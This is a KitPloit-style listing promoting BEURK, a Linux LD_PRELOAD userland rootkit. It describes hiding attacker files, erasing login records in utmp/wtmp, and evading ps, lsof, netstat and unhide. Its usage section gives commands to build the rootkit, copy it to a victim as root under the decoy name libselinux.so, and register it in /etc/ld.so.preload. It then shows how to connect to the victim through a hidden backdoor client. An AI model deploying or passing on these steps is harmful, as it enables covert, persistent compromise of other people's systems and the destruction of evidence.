Beurk - Experimental Unix Rootkit

2015-11-14T20:23:02
ID KITPLOIT:6869657204292880863
Type kitploit
Reporter KitPloit
Modified 2015-11-14T20:23:02

Description

BEURK is an userland preload rootkit for GNU/Linux, heavily focused around anti-debugging and anti-detection.
NOTE: BEURK is a recursive acronym for B EURK E xperimental U nix R oot K it

Features

  • Hide attacker files and directories
  • Realtime log cleanup (on utmp/wtmp )
  • Anti process and login detection
  • Bypass unhide, lsof, ps, ldd, netstat analysis
  • Furtive PTY backdoor client

Upcoming features

  • ptrace(2) hooking for anti-debugging
  • libpcap hooking undermines local sniffers
  • PAM backdoor for _ local privilege escalation _

Usage

  • Compile

    git clone https://github.com/unix-thrust/beurk.git
    cd beurk
    make
    
  • Install

    scp libselinux.so [email protected]:/lib/
    ssh [email protected] 'echo /lib/libselinux.so >> /etc/ld.so.preload'
    
  • Enjoy !

    ./client.py victim_ip:port # connect with furtive backdoor
    

Dependencies
The following packages are not required in order to build BEURK at the moment:

  • libpcap - to avoid local sniffing
  • libpam - for local PAM backdoor
  • libssl - for encrypted backdoor connection Example on debian:
    apt-get install libpcap-dev libpam-dev libssl-dev
    

Download Beurk